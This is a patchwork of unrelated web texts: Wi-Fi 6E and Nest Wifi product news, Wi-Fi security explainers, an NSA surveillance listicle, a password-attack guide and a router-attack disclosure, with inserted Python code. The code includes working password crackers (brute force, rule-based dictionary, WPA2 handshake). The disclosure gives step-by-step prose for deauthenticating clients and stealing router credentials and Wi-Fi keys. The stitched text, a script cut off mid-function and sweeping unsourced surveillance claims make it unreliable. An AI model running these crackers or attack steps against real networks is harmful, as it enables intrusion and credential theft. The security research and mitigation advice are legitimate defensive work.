Last September, Federal Communications Commission Chairman Ajit Pai mentioned that the FCC was interested in “opening up 1,200 megahertz of spectrum in the 6GHz band for different types of unlicensed uses,” including Wi-Fi.
Now it seems that the industry involving Wi-Fi-enabled devices is already gearing up to develop products that can make use of that freed up spectrum in the 6GHz band. According to a press release published on Friday, January 3, the Wi-Fi Alliance has even come up with a name for this new class of devices: Wi-Fi 6E. These devices are also expected to still offer the same features of Wi-Fi 6, namely things like faster data rates and lower latency.
As the Wi-Fi Alliance notes, it’s expected that once the 6GHz band is open for use, the kinds of devices that will use it first include “Wi-Fi 6E consumer access points and smartphones, followed by enterprise-grade access points.” In addition, Wi-Fi 6E is also expected to be adopted by “industrial environments” for uses such as “machine analytics, remote maintenance, or virtual employee training.” Other possible applications for 6GHz band and Wi-Fi 6E also include augmented reality and virtual reality.
Notably, the opening up of the 6GHz band for Wi-Fi is also expected to help deal with what the Wi-Fi Alliance refers to as a “Wi-Fi spectrum shortage”: the increasing demand for Wi-Fi will eventually surpass the actual capacity of the currently available unlicensed spectrum. By opening 6GHz to Wi-Fi, it’s expected that the new band will help fix the shortage by “providing contiguous spectrum blocks to accommodate 14 additional 80 MHz channels and seven additional 160MHz channels which are needed for high-bandwidth applications that require faster data throughput such as high-definition video streaming and virtual reality.” Wi-Fi 6E devices are in turn supposed to use this added capacity “to deliver greater network performance and support more Wi-Fi users at once, even in very dense and congested environments.”
As the release of Wi-Fi 6E products is still pending official regulatory approval of the opening of the 6GHz band to Wi-Fi, it’s still unknown when those products will be made available to the public, but companies are expected to move quickly once the approval goes through.
With the promise of speedy internet for every room, Google's new mesh Wi-Fi system wants to give Google Assistant a bigger footprint in our homes.
Available in your choice of three colors, Nest Wifi Points extend the range of Nest Wifi setups -- and they double as Google Assistant smart speakers, too.
Google on Tuesday announced the launch of the Nest Wifi, a refreshed version of the company's popular mesh router system, Google Wifi. Available for pre-order today and set to arrive November 4, the system is comprised of a Nest Wifi Router that plugs into your modem and separate Nest Wifi Points that wirelessly extend the reach of its signal -- and which themselves double as Google Assistant smart speakers.
A two-piece setup with the Nest Wifi Router and one Nest Wifi Point will cost $269. A three-piece setup with the Nest Wifi Router and two Nest Wifi Points will cost $349, and promises to cover homes of up to 3,800 square feet. That's enough coverage for 85% of homes in the US, Google says.
Mesh, meet Google Assistant
Beyond spreading a speedy internet signal throughout your home, the Nest Wifi promises to spread the voice-activated intelligence of Google Assistant around your house, too. That's because each of those Nest Points now doubles as a fully functional Google Assistant smart speaker, complete with always-listening microphones and touch controls on the top of the device.
The goal, Google says, is to get users to keep these things out in the open as opposed to hiding them out of sight, where they won't relay their signals as well. To that end, the new Nest Wifi Points also come in your choice of three colors (snow, sand or mist), and you can buy one on its own for $149. The Nest Router only comes in white, and costs $169 on its own.
You'll see an ambient glow from the light ring around the base of the Nest Point whenever it's sending audio to Google's cloud to come up with a response. When the mics are muted, the ring will glow orange.
"We realized that performance for the Wifi Point would double if it was off the floor, not hidden in a closet," said Ben Brown, Google product lead for the Nest Wifi. "Having a great design, having something you actually want to interact with, and having the Assistant on the device makes it actually so it's a much better Wi-Fi system."
You can use a Nest Wifi Point just like you'd use one of Google's other smart speakers, like the Nest Mini, which also made its debut today. You get its attention by saying "OK Google," and then you give it a question or a command, including new Wi-Fi-specific commands like asking for a speed test or to pause Wi-Fi to specific devices or groups of devices. A ring of white light around the base of the device will glow whenever it hears you, and to let you know that it's connecting with Google's cloud to come up with a response. If you want to turn the mics off, just flip the mute switch in the back.
We haven't had a whole lot of time to give it a close listen for ourselves, but Google says that the sound quality in each Nest Point is stronger than you might expect. That's because the need for extra space inside the device for the antennas and for heat dispersion means that there's also plenty of room to push sound around via the downward firing speaker, Brown says.
As for the touch controls on the top face of each marshmallowy device, you can tap the center to pause or resume playback, or tap the sides to turn the volume up and down. Like with the new Nest Mini, a set of indicator lights will glow when your hand draws near to show you where to aim for those volume controls.
Faster than before -- but where's Wi-Fi 6?
That new Nest Router is an AC2200 model, which means that it supports current-gen Wi-Fi 5 connections with a maximum combined speed of about 2,200 Mbps across all bands -- up from about 1,200 Mbps last time around. Your actual speed will be a lot lower, since you can only connect to one band at a time, but like Google Wifi before, Nest Wifi will automatically "steer" you from band to band as you move about your house in order to keep your connection as swift and steady as possible.
Another upgrade: the Nest Wifi Router now has four antennas and supports four spatial streams (4x4 MIMO). If you're using a client device such as a MacBook Pro that also supports multiple streams, it can combine them for a faster connection; a single-stream client such as most phones will not see that particular gain.
You can spread Nest Wifi Points around your home to triangulate a better internet connection in every room. The previous version of the system is our top-rated mesh setup.
All of the new hardware is also backwards compatible with first-gen Google Wifi setups, so you'll be able to add the new Nest Point extenders with their built-in speakers to your system if you've already bought in. And, if you decide to upgrade to the new Nest Router, your old Google WiFi access points will be able to connect to it and extend its signal, too.
As for the lack of support for next-gen Wi-Fi 6 features, Google suggests that it's still too early for the emerging standard in people's homes.
"It's really only 2022 by which point you're going to have a critical mass of [Wi-Fi 6] devices in the home, at which point Wi-Fi 6 will make sense in the home," said Sanjay Noronha, product lead for Nest Wifi. "And so, our philosophy is how do we make these products useful today?"
Google likely wants to keep its routers affordable, too. For reference, the Wi-Fi 6-ready version of Netgear Orbi, due out later this month, is slated to cost $700 for a two-pack with the router and a single satellite extender. Prices like that are out of reach for too many potential users, Noronha said.
Meanwhile, the newest Wi-Fi 5 version of Netgear Orbi costs $149 for a two-pack, and it supports built-in smart speaker functionality if you add in the $300 Orbi Voice extender with Alexa. Another competitor worth keeping an eye on: Amazon-owned Eero, which just released a new version of its Wi-Fi 5 mesh system as a $249 three-pack. That price is half the cost of the original, and an excellent indication that competition is heating up in the mesh category.
"We recognize that there's going to continue to be an evolution of technology, and we will continue to work on those evolutions," Brown said, "but we also want to make sure that we're delivering the best possible experience for everyone. And I think that we are very confident that this is what [Nest Wifi] represents today. And for the next, you know, five years, honestly."
Today’s Wi-Fi networks are often more secure than the typical wired network in the same building. That may seem like a bold opening statement, but it is frequently the case.
It is true that WLANs got off to a chequered start 20 years ago, with attackers finding ways around the early security procedures and protocols in place. Consequently, though, the industry devoted a great deal of effort and innovation towards making WLANs much more secure – and they succeeded. There are, however, still challenges in securing any network.
As we know, wireless “leaks out” to the surrounding environment, which means passers-by can see and attempt to connect to any network they choose, so steps must be put in place to mitigate this threat. For wired networks, the traditional defence is physical: containment within the building and locks on the doors. However, if a person with malicious intent gains physical access, perhaps through social engineering or tailgating, a device can be plugged in and access gained, and an attack can commence.
So how have WLANs been addressing security concerns? What has the result of all that investment and innovation been?
Wi-Fi Security Methods
The Gold standard is the use of Digital Certificates (802.1X with EAP-TLS). This method is preferable because, unlike user-created passwords, a certificate and its private key cannot be guessed, shared or phished the way a password can. However, this method is also the most complex for the network administrator to deploy. Unless a user-friendly self-service Enrolment System is used to automate the authorization, creation and distribution of certificates, secure WLAN setup for users can become a time-consuming task.
The Silver standard is username and password-based authentication, often linked to a user database such as Microsoft Active Directory. This works well, but network administrators need to implement it with care: proper server certificates must be deployed and clients must be configured to validate them, so that users only hand their credentials to a legitimate server, and user passwords must be suitably complex. Interestingly, both password complexity and frequency of change need not be as onerous as imagined and are well explained here.
We must accept that there will be a need to support some devices that cannot use the gold or silver methods. Such equipment often comprises devices that have crossed over from the home market to the workplace as digital transformation has taken hold: smart speakers, video streamers and casters, as well as other IoT devices. These are limited to Pre-Shared Key authentication. In the commercial world, issuing a unique static key per device (called Dynamic Pre-Shared Key, or per-device PSK) provides enhanced security and limits the damage of a breach if one key is discovered, since only that device’s key needs to be revoked rather than the key for the whole network.
2019 will see the introduction of a further security enhancement called WPA3. This new Wi-Fi security standard will replace WPA2, and improve the encryption strength and ease of setup of the methods discussed above.
Role Based Access – with a suitable WLAN infrastructure, the above access methods can map to user roles. Define what is allowed for a user type and apply rules accordingly. Roles provide a plethora of controls, from VLAN allocation, through to simple port and protocol-based firewall rules up to application-based recognition and control, including URL filtering.
Public WiFi is a growing part of everyday life. When your clients provide public WiFi, they have an obligation to protect users – but uncontrolled internet usage brings high risk. Download this guide, which covers five steps MSPs can take to protect their client’s public WiFi from hacking and other threats.
Topics covered include:
* Bandwidth and content filtering rules.
* DNS-layer protection.
* Separate Internet-enabled SSID and wireless isolation.
* User agreements.
* Positioning WiFi access points wisely.
Wireless security has two components: Authentication and secrecy. And, in theory, responsibility for network security lies with both operators and users.
Operators of Wi-Fi (or WLAN) access points should make sure that only those authorized can access the network and consume its resources. In more specific cases, an operator might want to know what each user does on the network and limit the number of devices they can connect.
Users of Wi-Fi networks should also have the ability to authenticate it themselves, although they rarely do. When connecting to a network, you mostly have no guarantee you are connecting to the entity you think you are connecting to.
It’s important for both users and operators to have the ability to secure communications while they are traversing the air. Otherwise, anyone within reach of the signal would be able to eavesdrop on the connections and possibly inject data.
Ideally, all communications should at all times be encrypted. Due to what we consider a pretty serious design flaw, however, data sent between the router and your device is only encrypted if there is a password set. It’s important to note, though, that the password is not the key used to encrypt the data. Instead, a new key is negotiated for each user and session.
Authenticating Wi-Fi networks
It is theoretically possible to encrypt all data even without setting a password, but current Wi-Fi standards don’t have this ability (the newly released WPA3 standard does). As such, you should always set a password to your network, even if you later print the password on signs for everyone in the building to see.
Primarily, passwords are used for authentication (only users that know a password can log into the network). But, as everybody uses the same password there is little to prevent people from sharing it with outsiders and (non-authorized) friends. Some apps even make password sharing possible between a large number of strangers.
While far more complicated from an administration perspective, it is possible to create individual accounts with unique passwords for each authorized user or device. Additionally, this setup makes it possible to track unique users around the building or network and eject them from the system.
It is also possible to use certificates to authenticate your connection to the correct router. These certificates, however, have to be verified through another secure channel and this feature is rarely used.
Wi-Fi standards and security
The standard known as Wi-Fi is defined under IEEE 802.11. It has been amended frequently to account for new bands, frequencies, and changes in technology (such as authentication and encryption).
Currently, there are two primary standards to secure Wi-Fi and encrypt connections: WEP and WPA.
WEP (Wired Equivalent Privacy, often also wrongly called Wireless Encryption Protocol), released in 1997, was, for a time, the only standard available. Its original 40-bit keys were a concession to U.S. export controls on cryptography, and by 2001 the way it reused RC4 key streams had been shown to let an eavesdropper recover the key from captured traffic. WEP was superseded by WPA (Wi-Fi Protected Access) in 2003 and by WPA2 in 2004.
WPA was an intermediate solution for hardware that couldn’t support WPA2’s AES-based encryption (CCMP); it kept RC4 and added TKIP as a stopgap. Since 2012, WPA (TKIP) is considered broken and defunct.
WPA3 is here, but it’s not ready
Specifications for WPA3 were announced in early 2018, but the standard is still not commonly available in software packages and hardware. WPA3 increases security and privacy, for example by encrypting all connections by default, and offers perfect forward secrecy.
As the operator of a Wi-Fi access point, you should use WPA2 with AES (CCMP) rather than TKIP until WPA3 is widely supported by your clients, as it is still the most robust standard that is broadly available.
Enable encryption on your network to make sure all your guests and users benefit from encrypted data while in transit between your router and their device.
Change the passwords to your router’s admin interface to make it difficult for anybody to mess with your network and install spyware and malware on it.
If you are worried about unauthorized access to your network, change passwords frequently and consider creating unique username and passwords for each user.
If you are worried about your guests doing nefarious things through your internet connection, consider installing a VPN on your router to avoid being blamed for the actions of your guests.
As the user of a Wi-Fi network, you should prefer encrypted connections over unencrypted ones. Use a browser extension such as HTTPS Everywhere so that as much of your traffic as possible is encrypted end to end.
Use a VPN for your phone or laptop to fully encrypt your data as it passes the airwaves, the Wi-Fi router, and the ISP.
Five years on from the revelations that the U.S. National Security Agency (NSA) collects personal data on every American—and many more people worldwide—the storm has passed.
It is important to learn about the methods the NSA uses to spy on citizens. Once you understand how your liberties are violated, you can start defending your data and reclaim your privacy.
Let’s take a look at 8 methods the NSA is using to spy on you right now, according to documents leaked by Edward Snowden and further investigation by the press.
How the NSA spies on you in America
1. They can access your phone records
In 2017, the NSA acquired data from over 534 million phone calls and text messages. Unbelievably, this tally is over triple the amount collected in 2015, when the USA Freedom Act supposedly limited NSA access to data from communication companies.
2. Your favorite internet services pass your data to the NSA
Facebook, Google, Apple, and six other leading online services have all gone on record as having given their customers’ data to the NSA, as legally required by the “PRISM” program. Data shared includes emails, messages, and documents.
3. The NSA can hack your devices
The NSA’s hacking unit, Tailored Access Operations, has developed a whole range of hacking exploits. These enable the NSA to break into consumer electronics devices and IT systems as it sees fit. When the NSA finds a security hole in a popular consumer device, they do not, as previously intended, fix the security hole, but instead exploit it. That leaves all our devices vulnerable to hackers.
4. All your security devices are exploitable thanks to the NSA
The NSA has also made the job of hacking security devices easier for itself, by coercing many manufacturers into building vulnerabilities into products such as networking switches, firewalls, and encryption protocols. These vulnerabilities are known to the NSA, which can exploit them at any time. The NSA also intercepts shipments of computers and phones and plants backdoors in them.
5. The NSA can track you wherever you are
When you move around your town, cell phone towers can calculate your exact position. The NSA keeps records of where you are at any time, and they can read all your incoming text messages and phone calls and store them indefinitely.
How the NSA spies on you overseas
6. The NSA has tapped internet lines worldwide
The internet connects different continents via undersea fiber optic cables that carry truly massive amounts of data. In some places, the NSA has deals with local intelligence agencies to tap into these cables; in others, it does so on its own. The NSA even uses submarines to attach snooping bugs to cables deep in the ocean.
7. The NSA hacks foreign companies
In Brazil, Germany and other countries, the NSA has broken into the internal networks of major telecommunications providers, intercepting the data they gather and weakening the security of their systems. They collect every email and phone call they can.
8. The NSA knows exactly what you own and buy
The NSA has access, through agreements and hacking, to major credit card networks, payment gateways, and wire transfer facilities. This allows them to follow every cent of your money, where it comes from, and what you are spending it on.
Protect yourself from government surveillance
While the NSA’s reach extends across the globe, there is still a lot you can do to safeguard your internet privacy. Check out this list of top privacy tips and always be conscious of what you’re sharing, with whom you’re sharing, and how you share it.
Welcome to Cyber Threats 101! This is the fifth chapter in our A Busy College Student’s Guide to Online Security. We’ll begin by defining what are password attacks and share expert tips on how to avoid becoming a victim to these attacks.
What are password attacks?
Password attacks are methods that take advantage of stolen, weak and/or reused passwords used to protect online accounts. In fact, 81 percent of hacking-related breaches in 2016 were the result of an attacker leveraging stolen and/or weak passwords.
Hackers can use one or more strategies to “guess” or crack stored passwords (which services normally keep as hashes rather than in plaintext), including brute force attacks, dictionary attacks, and keyloggers. Before we get into these attacks, you must first know what encryption is.
What is encryption?
Encryption is the process of encoding messages or information in such a way that only authorized parties can read it. It transforms data that you send across the Internet into a format which is only readable when in possession of a decryption key, which provides the code to decipher the encryption.
Brute Force Attacks take a “try-try again” approach to guess password possibilities using automation software. Starting with one-digit passwords, the program will continue to guess longer combinations of letters, numbers, and symbols.
What are dictionary attacks?
Dictionary Attacks are based on the idea that we love to use names, places, sports teams, slang, etc. in our passwords. This method also uses automation software to guess different password combinations based on commonly used words that could be found in the dictionary.
What are keyloggers?
Keyloggers are malicious programs that hackers implant on a target’s computer, commonly through phishing emails, to track and record every keystroke you make. They can record passwords, social security numbers, phone numbers, and even your credit card information.
Why shouldn’t I reuse a password on multiple accounts?
You should avoid reusing the same password on multiple accounts because hackers are known to use stolen or weak passwords from a massive data breach or from a password attack to deface your public profiles, commit identity fraud, steal your financial information, or send malicious messages or emails under your name.
Learn from the mistake of Facebook CEO Mark Zuckerberg, whose LinkedIn credentials were compromised in a massive data breach in 2012, which led to a hacker group also compromising his Pinterest and Twitter accounts; not to mention that his password was “dadada”.
Here are some tips to help you create a strong password:
Create a password that is–at a minimum–8 characters long. Ideally, your password should be between 12-15 characters.
Create a memorable, yet complex password by using a password mnemonic or a passphrase. You can start with a phrase, sentence, song lyric, etc. that is meaningful to you, but wouldn’t make sense to an automated computer program. You can also add a few numbers and special symbols for complexity.
Use a mix of case-sensitive letters, numbers, and symbols, but you won’t get away with replacing an “S” with a “$” or changing an “A” to “@”. In reality, hackers and automated password attack programs are already one step ahead of you and can easily pick up on these patterns.
Struggling to remember your new password? Write down a hint–not your password–that will jog your memory, but will be meaningless to anyone else. Then, keep it in a safe place.
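The two automated attacks described above, as an added example that is not part of the guide: a brute force that walks the keyspace shortest-first, and a dictionary attack whose rule set already includes the case changes, “S” to “$” substitutions and appended digits that people use to “strengthen” a word. The target hashes and word list are constructed inline; the rule set is a small illustrative one, not a copy of any real cracker’s rules.

```python
"""Password attacks on a stored hash: brute force and rule-based dictionary.

Added example, not code from the guide above. Hashes and word list are
constructed inline. Real services hash with a salt and a slow function,
which makes each guess cost more but does not change the logic shown here.
"""
import hashlib
import itertools

# Substitutions every cracking rule set already contains (the "S" -> "$" trick).
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
# Suffixes people append to a word to satisfy a complexity rule (illustrative).
SUFFIXES = ("", "1", "!", "123", "2019", "!1")


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def mangle(word: str):
    """Variants a dictionary attack tries for one base word: case changes,
    leet substitutions and common suffixes. Sorted so results are deterministic."""
    bases = {word.lower(), word.capitalize(), word.upper()}
    variants = set()
    for base in bases:
        for form in (base, base.translate(LEET)):
            for suffix in SUFFIXES:
                variants.add(form + suffix)
    return sorted(variants)


def dictionary_attack(target_hash: str, wordlist):
    """Return the mangled candidate whose hash matches target_hash, or None."""
    for word in wordlist:
        for candidate in mangle(word):
            if sha256_hex(candidate) == target_hash:
                return candidate
    return None


def brute_force(target_hash: str, alphabet: str, max_len: int):
    """Try every string of length 1..max_len over the alphabet, shortest first,
    which is the 'try-try again' approach described in the text."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if sha256_hex(candidate) == target_hash:
                return candidate
    return None


def keyspace(alphabet_size: int, max_len: int) -> int:
    """Number of guesses a full brute force up to max_len needs; shows why
    length matters more than any single substitution."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


if __name__ == "__main__":
    # Constructed targets: a "clever" variant of a dictionary word and a 4-digit PIN.
    print(dictionary_attack(sha256_hex("P@$$w0rd!"), ["hello", "password"]))
    print(brute_force(sha256_hex("7342"), "0123456789", 4))
    print(keyspace(95, 8), keyspace(95, 12))
```

Running it shows “P@$$w0rd!” falling to the dictionary attack on the second word, while a 12-character passphrase over the printable ASCII set has a keyspace roughly eighty million times larger than an 8-character one.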
UPDATE (5th September 2018). Since we published our original report, Google has now resolved the underlying vulnerability. The latest update of Chrome (tested against version 69.0.3497.81) addresses the issue we highlighted in this blog, where credentials are auto-filled on unencrypted HTTP pages. This makes the attack require significantly more user interaction, in the same way that Firefox, Edge, Internet Explorer and Safari do. This makes the exploit much closer to a phishing attack and much less likely to succeed.
It is important to note that the latest version of Opera is still vulnerable as of 2018-09-05, but will hopefully also be quickly patched. This is a positive response from Google and is great to see following our original report to them in March 2018.
As per our originally-proposed solution, it would also be great to see Microsoft adjust captive portals in Windows to behave in a similar way to those in MacOS (separate browser) and for router manufacturers to enforce HTTPS management by default on their devices. These changes would further limit this vector of attack.
Original Article:
During a recent engagement we found an interesting interaction of browser behaviour and an accepted weakness in almost every home router that could be used to gain access to a huge number of WiFi networks.
The browser behaviour relates to saved credentials. When credentials are saved within a browser, they are tied to a URL and automatically inserted into the same fields when they are seen again. The accepted home router weakness is simply the use of unencrypted HTTP connections to the management interfaces.
By combining these two components it was possible to gain access to various networks without cracking a single handshake. Handshake cracking is currently the most-used method of gaining access to a WPA/WPA2 network, but it only succeeds against a weak passphrase. The attack should work on most networks, but there are a few pre-requisites that need to be met for it to succeed:
There MUST be an active client device on the target network
Client device MUST have previously connected to any other open network and allowed automatic reconnection
Client device SHOULD* be using a Chromium-based browser such as Chrome or Opera
Client device SHOULD** have the router admin interface credentials remembered by the browser
Target network’s router admin interface MUST be configured over unencrypted HTTP
Without those five pre-requisites, the attack is not possible. However, those are all somewhat likely occurrences given that most browsers prompt users to save credentials automatically. The main pre-requisites that lower the likelihood are Chromium usage and saved router credentials, but this will still affect a huge number of people.
*Firefox, IE/Edge and Safari require significant user interaction, so the attack does work, but it is more social-engineering based. With Chrome it is significantly more seamless. **If the router’s admin interface credentials are not saved, it is still possible to attempt to guess default values.
It is also important to note that the attack has been demonstrated against home routers by extracting the WiFi key directly from the web interface. However, other devices can be targeted if they have a semi-predictable URL that is exposed over unencrypted HTTP. Many IoT devices fit into this category but none were specifically tested here.
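The handshake cracking that the attack above sidesteps, and the earlier explainer’s point that the Wi-Fi password is not itself the encryption key, come down to the same key schedule. The following is an added example, not code from either article: it derives the WPA2 Pairwise Master Key from the passphrase and SSID, expands it into the per-session Pairwise Transient Key using the nonces from the 4-way handshake, and checks a candidate passphrase against the MIC of handshake message 2 the way aircrack-ng does. The PBKDF2 and PRF constructions follow IEEE 802.11i; the “captured” handshake (MAC addresses, nonces, EAPOL frame) is constructed inline for the example.

```python
"""WPA2-Personal key derivation and handshake check.

Added example, not code from either article above. The PBKDF2/PRF
construction is the one in IEEE 802.11i; the handshake capture below is
constructed inline (MAC addresses, nonces and EAPOL frame are made up).
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    # This is the only place the passphrase is used; it never encrypts traffic itself.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated.
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Pairwise Transient Key for CCMP: KCK(16) | KEK(16) | TK(16). The nonces are
    # fresh per association, so the same passphrase yields a new TK every session.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of key descriptor precede the MIC


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def passphrase_matches(passphrase: str, cap: dict) -> bool:
    # One candidate check: derive PMK and PTK, recompute the MIC of message 2 and
    # compare. 4096 PBKDF2 rounds per guess is why only weak passphrases fall to this.
    pmk = pmk_from_passphrase(passphrase, cap["ssid"])
    ptk = ptk_from_pmk(pmk, cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
    captured_mic = cap["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    return hmac.compare_digest(eapol_mic(ptk[:16], cap["eapol"]), captured_mic)


def crack(cap: dict, candidates):
    """Return the first candidate whose MIC matches the capture, or None."""
    for candidate in candidates:
        if passphrase_matches(candidate, cap):
            return candidate
    return None


def build_demo_capture(passphrase: str = "password", ssid: str = "IEEE") -> dict:
    # Constructed 4-way handshake message 2 (client -> AP). Only the frame layout
    # follows 802.11; every value is made up for the example.
    aa = bytes.fromhex("0013105f7c3e")       # AP MAC (constructed)
    spa = bytes.fromhex("00e0de1c8b2a")      # client MAC (constructed)
    anonce = bytes(range(32))                # constructed nonces
    snonce = bytes(range(32, 64))
    body = (
        b"\x02"                              # descriptor type: RSN
        + b"\x01\x0a"                        # key info: version 2, pairwise, MIC present
        + b"\x00\x10"                        # key length 16 (CCMP)
        + (1).to_bytes(8, "big")             # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID (all zero in msg 2)
        + bytes(16)                          # MIC placeholder
        + b"\x00\x00"                        # key data length
    )
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type EAPOL-Key
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    frame = frame[:MIC_OFFSET] + eapol_mic(ptk[:16], frame) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "eapol": frame}


if __name__ == "__main__":
    cap = build_demo_capture()
    print("PMK:", pmk_from_passphrase("password", "IEEE").hex())
    print("recovered passphrase:", crack(cap, ["letmein", "12345678", "password"]))
```

The PMK for passphrase “password” and SSID “IEEE” is the published 802.11i test vector, so the derivation can be checked against the standard; changing either nonce in `ptk_from_pmk` gives a different PTK, which is the concrete meaning of “a new key is negotiated for each user and session”.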
Before getting to the meat of the attack, we are assuming that you are already familiar with the Karma/Jasager attack. Karma is used in part of the workflow and if you are not familiar with it, consider reading the following article:
Step 1. Bring the client device onto a network we control:
The first step is to start sending deauthentication frames with aireplay-ng while running the Karma attack using ‘hostapd-wpe’, both with an Alfa AWUS036NHA.
Step 2. Trigger the browser to load our URL:
We did this with ‘dnsmasq’ and a Python script. When we see a HTTP request, we create a response redirecting to our URL and serve our own page.
The URL and served page are different depending on the router we’re targeting. We can detect which URL/Page pair to send based on BSSID and ESSID or just take a guess, the range of options is limited anyway.
There are some extra options for redirection too. By default, we allow HTTPS through untouched and wait for an HTTP request. But if this is taking too long, triggering captive portal detection on Windows will automatically launch the default browser at a URL we specify. However, there are limitations to triggering a captive portal, primarily against MacOS, which launches a separate browser specific to dealing with captive portals, preventing us from accessing stored credentials.
Step 3. Steal the autocomplete credentials:
This is where things get interesting. When our page loads, the browser makes two initial checks.
Does our URL origin match the router’s admin interface origin (protocol & IP address/hostname)
Do the input fields on the page match what the browser remembers of the router’s interface
If these two checks pass, then the browser automatically populates our page with the saved credentials. In this case, the router’s admin details. Naturally these input fields are completely hidden from the target.
If the target is using Chrome, there is one more step: The Chromium feature “PasswordValueGatekeeper” requires a user to interact with the page in some way. A click anywhere on the page is fine, and after the click we can harvest the credentials.
If the target is using Firefox, Internet Explorer, Safari or Edge, then we can’t have the input fields hidden. The attack would still work, but only if the target clicks on our form field and selects their credentials from the drop-down. At this point the attack is mostly social engineering.
But let’s not stop here, these credentials are almost useless right now. There’s even a good chance we might have guessed them before we even started the attack (for example, admin:password) but we can’t use them from our current position on the outside of the network.
Step 4. Send the target to their home WiFi
Once we have the credentials, we want the target to keep our page open just a little longer. At this point we stop our Karma attack, releasing the target back to their own network.
Once the target device is successfully connected back to their original network, our page is sitting on the router admin interface’s origin with the admin credentials loaded into JavaScript. We then login using an XMLHttpRequest and grab the PSK or make whatever changes we need. In most WiFi routers that we tested, we could extract the WPA2 PSK directly from the web interface in plaintext, negating the entire need to capture a handshake to the network. But if a router hides the key, we could enable WPS with a known key, create a new access point or anything else we can do from within the router’s interface.
We wouldn’t even need to know the HTML structure of the router’s interface. We could just grab the entire page DOM, send it home and extract anything useful by hand. Using BeEF Project it would also be possible to proxy through to the page, granting the attacker access to the router interface as if they were logged in directly.
Solution
Fundamentally this is just a flaw in the way origins are shared and trusted between networks. In the case of home routers, they are predictable enough to be a viable target.
The easiest solution would be for browsers to avoid automatically populating input fields on unsecured HTTP pages. It is understandable that this would lower usability, but it would greatly increase the barrier to credential theft.
The most complete solution would be to implement HTTPS with trusted keys and certificates on these devices. But this requires support for custom HTTPS certificates as well as your own certificate management infrastructure; in an enterprise this is commonplace, but for home users it is extremely unlikely. Vendors might consider enabling HTTPS on their devices by default, but a key shared across a product line could simply be extracted by anyone with one of the devices by reverse-engineering the firmware, and a key generated per device at first boot would be self-signed and so still produce a browser warning.
Microsoft could also make the process more difficult to exploit by using a separate captive portal browser instead of simply launching the default browser similar to how MacOS behaves.
Disclosure Timeline
Chromium:
SureCloud: Disclosed March 2nd
Chromium: Response Received March 2nd (“working as designed”)
Microsoft
SureCloud: Disclosed March 27th
SureCloud: Chase Sent April 13th
[Microsoft’s messages were all being flagged as spam]
Microsoft: Response Received May 25th (Clarification requested)
SureCloud: Clarification Sent June 4th
Microsoft: Case opened June 5th
Microsoft: Requested disclosure details June 6th
SureCloud: Clarification sent June 6th
Microsoft: Flagged for consideration, but no immediate action June 21st
Asus
SureCloud: Disclosed March 21st
Asus: Responded March 22nd (Discussing with engineers)
SureCloud: Discussing solutions April 4th
SureCloud: Sent notice to publish May 25th
Asus: Discussing solutions June 11th
SureCloud: Discussing solutions and notice to publish July 11th
Following the discussions with ASUS, it became clear we had exhausted all options for ethical disclosure with this Proof of Concept.
References
While this was only discovered after disclosing to Chromium, someone named Chris had beaten us to the underlying idea. We have however taken it much further and demonstrated a real-world attack.
These are Proof of Concept only and the community will no doubt take this attack much further. The long-term goal is to build a module for the WiFi Pineapple to automate the attack, which is expected in the coming months.
Video
Mitigations
As highlighted we are exploiting ‘by design’ features, which will hopefully change with public release of this article. However, in the meantime there are a few key steps that can be taken to help protect yourself:
Only login to your router using a separate browser or incognito session
Clear your browser’s saved passwords and don’t save credentials for unsecure HTTP pages
Delete saved open networks and don’t allow automatic reconnection
As it is nearly impossible to tell if this attack has already happened against your network, change your pre-shared keys and router admin credentials ASAP. Again, use a separate/private browser for the configuration and choose a strong key.
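The second mitigation above is easier to act on if you can see which saved credentials are exposed. The following is an added example, not code from the SureCloud article: it reads the `logins` table of a Chromium “Login Data” SQLite file and flags every entry saved for a plain-HTTP origin, because a browser keys autofill on scheme, host and port, and on HTTP an attacker who controls the network can serve any of those. Entries on private IPs or LAN-style names are rated higher because they are the predictable router origins the attack relies on. Only `origin_url` and `username_value` are read (the encrypted `password_value` is never touched); the demo database is constructed inline with a minimal subset of the real schema, and the LAN-host heuristic and risk labels are this example’s own.

```python
"""Audit a Chromium password store for credentials tied to plain-HTTP origins.

Added example, not code from the article. Reads only origin_url and
username_value from the 'logins' table; the demo database is constructed
inline with a minimal subset of the real schema.
"""
import ipaddress
import sqlite3
from urllib.parse import urlsplit


def origin_of(url: str) -> str:
    # Saved credentials are keyed by origin (scheme, host, port); the path is ignored,
    # so any page on the same http://host:port is offered the same autofill.
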